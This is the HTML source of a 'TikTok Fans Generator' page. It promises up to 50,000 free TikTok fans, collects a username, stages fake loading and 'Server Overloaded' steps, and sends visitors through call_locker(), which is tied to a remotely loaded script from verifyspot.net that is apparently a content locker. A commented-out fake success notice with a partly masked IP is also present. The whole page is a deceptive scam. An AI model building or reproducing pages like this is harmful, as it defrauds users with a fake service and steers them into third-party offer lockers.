﻿<!doctype html>
<html lang="en">



<head>

    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="stylesheet" href="css/bootstrap.min.css">
    <link rel="stylesheet" href="use.fontawesome.com/releases/v5.6.3/css/all.css" integrity="sha384-UHRtZLI+pbxtHCWp1t77Bi1L4ZtiqrqD80Kn4Z8NTSRyMA2Fd33n5dQ8lWUE00s/" crossorigin="anonymous">
    <link rel="stylesheet" href="css/flag-icon.min.css">
    <link rel="stylesheet" href="css/main.css">
    <link rel="icon" type="image/x-icon" href="favicon.ico">
    <script type="text/javascript" id="ogjs" src="https://www.verifyspot.net/cl/load.php?id=be7c65e083d6ca1086beb261f5a54de4"></script>


    <title>TikTok Fans Generator</title>

</head>

<body>

<div id="particles-js"></div>

    <div class="container">

        <div class="row text-center justify-content-center">

            <div class="col text-center justify-content-center d-none d-md-block">

                <img src="img/logo-1.png" class="w-25 mb-4">

                <h1 class="ffflick mt-4">Our <strong>TikTok-Tool</strong> works only on mobile phones and tablets. Get back here with your smartphone or tablet to <strong> get up to 50,000 TikTok fans for free.</strong>.</h1>

            </div>

            <div class="col text-center justify-content-center pl-0 pr-0 d-md-none">

                <div class="tttop p-2">

                  <div class="tttleft"> <!--<img src="flags/1x1/de.svg" class="flick-flag">--> </div> <div class="tttmiddle"> <!--<h5 class="m-0"></span> 170.***.177.105 erhielt <br><strong>50000 neue fans</strong></h5>--> </div> <div class="tttright"> <img src="img/logo-1.png" class="flick-logo"> </div>

                </div>

                <div class="mmmain p-4">

                  <div class="XDD">

                    <h1 class="s_1" style="font-size: 1.8rem !important;">Get yourself <strong>50 000</strong></h1>

                    <img class="img-fluid pl-2 pr-2 mt-1 mb-1" src="img/logo-2.png">

                    <h1 class="s_1">new <strong>fans</strong> free</h1>

                    <h2 class="s_2 s_25 justify-content-center mt-1">Server connection</h2>

                    <h2 class="s_4 justiy-content-center mt-1">Last step - Server Overloaded</h2>

                    <h5 class="s_4">Our server is overloaded, but you can still get your followers instantly!Click on the button below in order to get your followers.</h5>

                    <button class="btn btn-lg btn-block btn-2 s_4 mt-3" onclick="call_locker();">Continue</button>

                    <div id="ppp" class="s_2 mb-2"></div>

                    <hr class="bg-6 p-0 m-2 s_1">

                    <div class="form-group mb-2 s_1">
                        <label for="tiktok-name"><strong>Step 1: </strong>Enter your TikTok username.</label>
                        <input type="text" class="form-control form-control-lg" id="tiktok-name" aria-describedby="tiktok-help" placeholder="TikTok Username">
                        <small id="tiktok-help" class="form-text c-5">With our <strong>TikTok tool</strong> is completely safe and free.</small>

                        <select class="form-control form-control-lg mt-1" id="fans-select" aria-describedby="select-help">

                        <option value="">Select number of fans</option>
                        <option value="1000">1000 Fans</option>
                        <option value="5000">5000 Fans</option>
                        <option value="10000">10 000 Fans</option>
                        <option value="25000">25 000 Fans</option>
                        <option value="50000">50 000 Fans</option>


                    </select>

                    </div>

                    <button class="btn btn-lg btn-block btn-1 s_1 t-c" onclick="s_1();">Continue</button>

                    <h5 id="loading1" class="s_3"></h5>
                    <h5 id="loading2" class="s_3"></h5>
                    <h5 id="loading3" class="s_3"></h5>
                    <h5 id="loading4" class="s_3"></h5>
                    <h5 id="loading5" class="s_3"></h5>

                    <button class="btn btn-lg btn-block btn-2 s_3 mt-3" onclick="lala();">Continue</button>

                  </div>

                </div>

                <div class="bbbottom p-2">

                </div>

            </div>

        </div>

    </div>

    <script src="js/jquery-3.4.1.min.js"></script>
    <script src="js/popper.min.js"></script>
    <script src="js/bootstrap.min.js"></script>
    <script src="js/particles.min.js"></script>
    <script src="js/progressbar.min.js"></script>
    <script src="js/main.js"></script>




</body>



</html>
